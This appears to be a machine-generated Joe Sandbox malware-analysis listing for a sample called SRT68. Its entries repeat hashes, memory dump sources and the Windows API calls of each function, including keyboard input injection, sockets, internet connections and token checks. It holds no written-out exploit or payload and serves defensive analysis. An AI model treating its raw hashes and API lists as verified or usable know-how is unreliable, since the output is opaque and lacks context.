                                                                      • Instruction ID: 962e0c32296557c41c534b5dc2288577ec22e2d98fc629899a2c084164a0622d
                                                                      • Opcode Fuzzy Hash: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
                                                                      • Instruction Fuzzy Hash: 0181FE75900209EFCB04DFA4C984DEEB7B9FF89315F244558E505EB260DB71AE05DB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
                                                                      • Instruction ID: d857bd3db42298a20ad0b0e7a462307d019170df689a162411b4d47fc0bc5e43
                                                                      • Opcode Fuzzy Hash: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
                                                                      • Instruction Fuzzy Hash: 5551D375B0430ADADB24AF65D891B3EB3E5AF45310F20C81FE696DB2A1DF78D841A710
                                                                      APIs
                                                                      • GetWindowRect.USER32(0158D910,?), ref: 01029863
                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 01029896
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01029903
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
                                                                      • Instruction ID: 053e7130836c370abaf3f0ff2082af8a8f0cd308cce23a6317b3524aae207b9d
                                                                      • Opcode Fuzzy Hash: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
                                                                      • Instruction Fuzzy Hash: 6E518274A00229EFCF21CF6CC884AAE7BF5FF45364F148199F8959B291D771A981CB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FF9AD2
                                                                      • __itow.LIBCMT ref: 00FF9B03
                                                                        • Part of subcall function 00FF9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FF9DBE
                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FF9B6C
                                                                      • __itow.LIBCMT ref: 00FF9BC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
                                                                      • Instruction ID: 7bebb116de7114108ed9ee0e2e49ba93f267805cd3db362cc90ed52fe2af9474
                                                                      • Opcode Fuzzy Hash: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
                                                                      • Instruction Fuzzy Hash: 0B417070A0420DABDF21EF54DC45FFE7BB9EF89760F000059BA05662A1DBB49A44DBA1
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 010169D1
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010169E1
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01016A45
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 01016A51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                      • String ID:
                                                                      • API String ID: 2214342067-0
                                                                      • Opcode ID: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
                                                                      • Instruction ID: 4c96861e6ca6a6b9eaccb3beebe3b0876a689cb9eb61e7098c91be7d6b401e32
                                                                      • Opcode Fuzzy Hash: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
                                                                      • Instruction Fuzzy Hash: 5E41A2B57402006FEB60AF24CC86F7A77E49F05B54F44806CFA599B2C2DAF99D019B91
                                                                      APIs
                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0102F910), ref: 010164A7
                                                                      • _strlen.LIBCMT ref: 010164D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
                                                                      • Instruction ID: bc751d0a623a5ef5aeafce9de95f406746a7251dd97f8705b9092f2f0653c787
                                                                      • Opcode Fuzzy Hash: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
                                                                      • Instruction Fuzzy Hash: 1E410671600105ABCB10EBA8DC85FFEB7F8AF05310F048159F95A9B296DF78AD04DB50
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0100B89E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0100B8C4
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0100B8E9
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0100B915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: b2c028525bcf09374605f30f2b4e3cec5764d6d10293cd4d98f1534827ab5621
                                                                      • Instruction ID: 85ddb17dbafe979cc5060cfad7dc7881945d83faeeac2a4e25d989cbe71e8134
                                                                      • Opcode Fuzzy Hash: b2c028525bcf09374605f30f2b4e3cec5764d6d10293cd4d98f1534827ab5621
                                                                      • Instruction Fuzzy Hash: CE413979600611DFCB11EF14C484A5EBBE1EF4A310F598098EC8A9B362CB78FD01DB91
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010288DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: fb6d6e42037d7585d108dc53f86f6ae6472b00a4f582413ce3d7a6f80a9042fb
                                                                      • Instruction ID: af9b092e59382c41a020751ee352e0a067b55666af03f51e2657114ad043bed4
                                                                      • Opcode Fuzzy Hash: fb6d6e42037d7585d108dc53f86f6ae6472b00a4f582413ce3d7a6f80a9042fb
                                                                      • Instruction Fuzzy Hash: 7031E13C700129BEEB719E68DC44BAC7BE5EB0A350F588143FAD1E61A1C67595408B52
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 0102AB60
                                                                      • GetWindowRect.USER32(?,?), ref: 0102ABD6
                                                                      • PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
                                                                      • MessageBeep.USER32(00000000), ref: 0102AC57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: 371df91ee05abf8eb191e48e6c958738b8402a733ead1c002a383e435fbaf6ab
                                                                      • Instruction ID: 0ad00a57d7021eee7b3ae802ecace40512317ed5a24c9bf7e3677f94b0c0fa4c
                                                                      • Opcode Fuzzy Hash: 371df91ee05abf8eb191e48e6c958738b8402a733ead1c002a383e435fbaf6ab
                                                                      • Instruction Fuzzy Hash: 6441B130700129DFCB22CF58C884BA9BBF5FF88750F2484A9E9949F655CB31E841CB90
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01000B27
                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 01000B43
                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 01000BA9
                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 01000BFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: c3d5677d1437927bfbd520174d34b9a7c57e03a58e8045e67f232e9a19a49063
                                                                      • Instruction ID: 6f8eab147665d3ad018cb6e6cc2d3a5e7b2f9dafa5bc3adba9d6d5814e443391
                                                                      • Opcode Fuzzy Hash: c3d5677d1437927bfbd520174d34b9a7c57e03a58e8045e67f232e9a19a49063
                                                                      • Instruction Fuzzy Hash: B5314830E44A18AEFB338E2D8C05BFEBBE5AF45394F08439AF6C1521D9C3B985449751
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 01000C66
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 01000C82
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 01000CE1
                                                                      • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 01000D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: bf28746bb2148bbcc1d5234c529601c83434a65179ec8be9b95626d6b4abfe98
                                                                      • Instruction ID: 9978a57d852dea6097c1082b9447465264bec6b29fe97bc91151494036d80b6a
                                                                      • Opcode Fuzzy Hash: bf28746bb2148bbcc1d5234c529601c83434a65179ec8be9b95626d6b4abfe98
                                                                      • Instruction Fuzzy Hash: 5E31353090031C6EFF368B28C818BFEBBA6AF45350F04439BF5C1521D9C379954587A2
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FD61FB
                                                                      • __isleadbyte_l.LIBCMT ref: 00FD6229
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD6257
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD628D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 85eeef74336b30b112b17685d9bb219faa29d2a50cd205f61fe59ffd9fda4a16
                                                                      • Instruction ID: eb655e4eb92fa0893275b34a19ba85d4fc97ab3e5fcac78988f30f6f1ba3d689
                                                                      • Opcode Fuzzy Hash: 85eeef74336b30b112b17685d9bb219faa29d2a50cd205f61fe59ffd9fda4a16
                                                                      • Instruction Fuzzy Hash: 7931E131A00246AFDF218F64CC45BBA7BBAFF42761F19402AF864D7291D731D950EB90
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 01024F02
                                                                        • Part of subcall function 01003641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100365B
                                                                        • Part of subcall function 01003641: GetCurrentThreadId.KERNEL32 ref: 01003662
                                                                        • Part of subcall function 01003641: AttachThreadInput.USER32(00000000,?,01005005), ref: 01003669
                                                                      • GetCaretPos.USER32(?), ref: 01024F13
                                                                      • ClientToScreen.USER32(00000000,?), ref: 01024F4E
                                                                      • GetForegroundWindow.USER32 ref: 01024F54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 8bfe4f71ba5b4a3cb7bcf9a44daa0756dd9f3a4bb6907e0d095e1e5cda2e5485
                                                                      • Instruction ID: 98f26d07a881fa05944991c020eaf701ecea21befdfa60737c48f09ca721c415
                                                                      • Opcode Fuzzy Hash: 8bfe4f71ba5b4a3cb7bcf9a44daa0756dd9f3a4bb6907e0d095e1e5cda2e5485
                                                                      • Instruction Fuzzy Hash: FE310DB1D00109AFDB10EFA5CC859EFB7F9EF99300F10406AE555E7241DAB99E458BA0
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • GetCursorPos.USER32(?), ref: 0102C4D2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FDB9AB,?,?,?,?,?), ref: 0102C4E7
                                                                      • GetCursorPos.USER32(?), ref: 0102C534
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FDB9AB,?,?,?), ref: 0102C56E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
                                                                      • Instruction ID: 1527163b5c37cf381370a52c172083962b88559186bfd1214030abbb455fe2d1
                                                                      • Opcode Fuzzy Hash: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
                                                                      • Instruction Fuzzy Hash: 8F31C135600038AFEB65CF5CC858EAE7FF5EB09390F444099FA858B261CB359990DBA4
                                                                      APIs
                                                                        • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
                                                                        • Part of subcall function 00FF810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
                                                                        • Part of subcall function 00FF810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
                                                                        • Part of subcall function 00FF810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
                                                                        • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FF86A3
                                                                      • _memcmp.LIBCMT ref: 00FF86C6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF86FC
                                                                      • HeapFree.KERNEL32(00000000), ref: 00FF8703
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
                                                                      • Instruction ID: bc3408d7cc8cce69c82f8ba8f7eb3c00bdc3dc1649b0b5bee5f5efc22c08387c
                                                                      • Opcode Fuzzy Hash: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
                                                                      • Instruction Fuzzy Hash: 96216972E0010DEBDB10DFA4CA49BFEB7B8EF45394F154059E544AB250EB35AE06EB90
                                                                      APIs
                                                                      • __setmode.LIBCMT ref: 00FC09AE
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                      • _fprintf.LIBCMT ref: 00FC09E5
                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00FF5DBB
                                                                        • Part of subcall function 00FC4AAA: _flsall.LIBCMT ref: 00FC4AC3
                                                                      • __setmode.LIBCMT ref: 00FC0A1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                      • String ID:
                                                                      • API String ID: 521402451-0
                                                                      • Opcode ID: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
                                                                      • Instruction ID: 169806085914589823341841466f748e417b257795081fc396db12ed21d50a36
                                                                      • Opcode Fuzzy Hash: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
                                                                      • Instruction Fuzzy Hash: 42112772908206AFDB04B6B49C47FFEB768AF46320F14005DF205561C2EE7D5C4677A5
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010117A3
                                                                        • Part of subcall function 0101182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
                                                                        • Part of subcall function 0101182D: InternetCloseHandle.WININET(00000000), ref: 010118E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
